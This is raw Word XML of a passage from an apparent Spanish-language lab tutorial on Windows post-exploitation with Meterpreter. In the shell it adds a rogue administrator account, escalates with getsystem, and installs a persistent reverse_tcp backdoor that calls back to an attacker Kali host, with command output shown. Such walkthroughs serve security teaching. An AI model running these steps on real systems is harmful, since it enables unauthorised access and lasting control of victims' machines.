    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\Administrador\Downloads&gt;net user </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Cuentas de usuario de \\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">Administrador            computaxioaxion2010      computaxion2021          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">Invitado                 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>El comando se ha completado con uno o m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:t>s errores.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595C48" w:rsidRDefault="00595C48" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00595C48" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Bien teniendo en cuenta los usuarios que tiene ahora vamos a crear uno nosotros….</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AA0B14">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6165"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;net user computaxion /add</w:t>
      </w:r>
      <w:r w:rsidR="00AA0B14" w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>net user computaxion /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Se ha completado el comando correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00595C48" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Bien vemos que se creo correctamente y chequeamos que asi sea con el siguiente comando….</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595C48" w:rsidRDefault="00595C48" w:rsidP="00AE15F3"/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>C:\Users\Administrador\Downloads&gt;net user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Cuentas de usuario de \\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">Administrador            computaxioaxion2010      </w:t>
      </w:r>
      <w:r w:rsidRPr="00595C48">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">computaxion              </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">computaxion2021          Invitado                 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>El comando se ha completado con uno o m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:t>s errores.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="0067240C" w:rsidP="00AE15F3">
      <w:r>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/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>C:\Users\Administrador\Downloads&gt;net localgroup administradores computaxion /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>net localgroup administradores computaxion /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Se ha compl</w:t>
      </w:r>
      <w:r w:rsidR="008F14C0">
        <w:t>etado el comando correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="008F14C0" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;net user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Ahora crearemos una carpeta llamada computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="008F14C0" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;mkdir computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>mkdir computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="009D7D47" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7D47">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;cd computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>cd computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="009D7D47" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7D47">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads\computaxion&gt;dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> El volumen de la unidad C no tiene etiqueta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve"> El n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:t>mero de serie del volumen es: 8E25-9581</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve"> Directorio de C:\Users\Administrador\Downloads\computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>07/12/2019  08:24 p.m.    &lt;DIR&gt;          .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>07/12/2019  08:24 p.m.    &lt;DIR&gt;          ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">               0 archivos              0 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">               2 dirs  46.034.792.448 bytes libres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Creamos otra carpeta llamada 123 dentro de la carpeta computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="008F14C0" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads\computaxion&gt;mkdir 123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>mkdir 123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRPr="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="008F14C0">
        <w:t>luego eliminamos la carpeta llamada 123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRPr="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="008F14C0" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads\computaxion&gt;rmdir 123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>rmdir 123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRDefault="00571C8D" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="008F14C0">
        <w:t>Salimos</w:t>
      </w:r>
      <w:r w:rsidR="008F14C0" w:rsidRPr="008F14C0">
        <w:t xml:space="preserve"> dela </w:t>
      </w:r>
      <w:r w:rsidRPr="008F14C0">
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidR="008F14C0" w:rsidRPr="008F14C0">
        <w:t xml:space="preserve"> y pasamos al prom de meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="008F14C0" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads\computaxion&gt;exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00AE15F3" w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRPr="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="008F14C0">
        <w:t>En el prom de meterpreter le damos el siguiente comando</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="008F14C0" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRPr="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="008F14C0">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:line="540" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F14C0">
        <w:t xml:space="preserve">Ahora sabiendo que tenemos acceso como </w:t>
      </w:r>
      <w:r w:rsidRPr="008F14C0">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>administrador</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> atravez de la técnica 1 vamos a tratar de crear una puerta trasera</w:t>
      </w:r>
      <w:r w:rsidR="0094382B">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00571C8D">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“persistente</w:t>
      </w:r>
      <w:r w:rsidR="0094382B">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que nuestra victima se conecte cada determinado tiempo</w:t>
      </w:r>
      <w:r w:rsidR="0094382B">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="222222"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a nuestra maquina kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F14C0" w:rsidRPr="008F14C0" w:rsidRDefault="008F14C0" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="0094382B" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094382B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; run persistence -x -u -i 30 -p 4444 -r 192.168.52.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.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>[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]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>[*] Running Persistence Script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>[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-OLLU9KG29C5_20191207.2906/WIN-OLLU9KG29C5_20191207.2906.rc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>[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=4444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>[*] Persistent agent script is 99664 bytes long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>[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\1\xxNdbjuBKfjS.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\1\xxNdbjuBKfjS.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[+] Agent executed with PID 488</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094382B" w:rsidRDefault="0094382B" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0094382B" w:rsidRPr="0094382B" w:rsidRDefault="0094382B" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="0094382B">
        <w:t xml:space="preserve">Con el </w:t>
      </w:r>
      <w:r w:rsidR="00571C8D" w:rsidRPr="0094382B">
        <w:t>comando</w:t>
      </w:r>
      <w:r w:rsidRPr="0094382B">
        <w:t xml:space="preserve"> background salimos de la </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0094382B">
        <w:t>sección</w:t>
      </w:r>
      <w:r w:rsidRPr="0094382B">
        <w:t xml:space="preserve"> de meterpreter pero sin perder la </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0094382B">
        <w:t>conexión</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="0094382B" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094382B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A">
      <w:r>
        <w:t>*****************************************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="0030065A"/>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3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Default="006E681E" w:rsidP="0030065A"/>
    <w:p w:rsidR="006E681E" w:rsidRPr="0030065A" w:rsidRDefault="006E681E" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process 2984 created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="009D7D47">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.3.9600]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(c) 2013 Microsoft Corporation. </w:t>
      </w:r>
      <w:r>
        <w:t>Todos los derechos reservados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="009D7D47" w:rsidP="0030065A">
      <w:r>
        <w:t>Con</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> el siguiente comando vamos a ver los usuarios actuales dentro de la maquina victima.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r>
        <w:t xml:space="preserve">root@computaxion:~# net user </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="009D7D47" w:rsidP="0030065A">
      <w:r>
        <w:t>Luego</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> vamos a crear nuestro usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
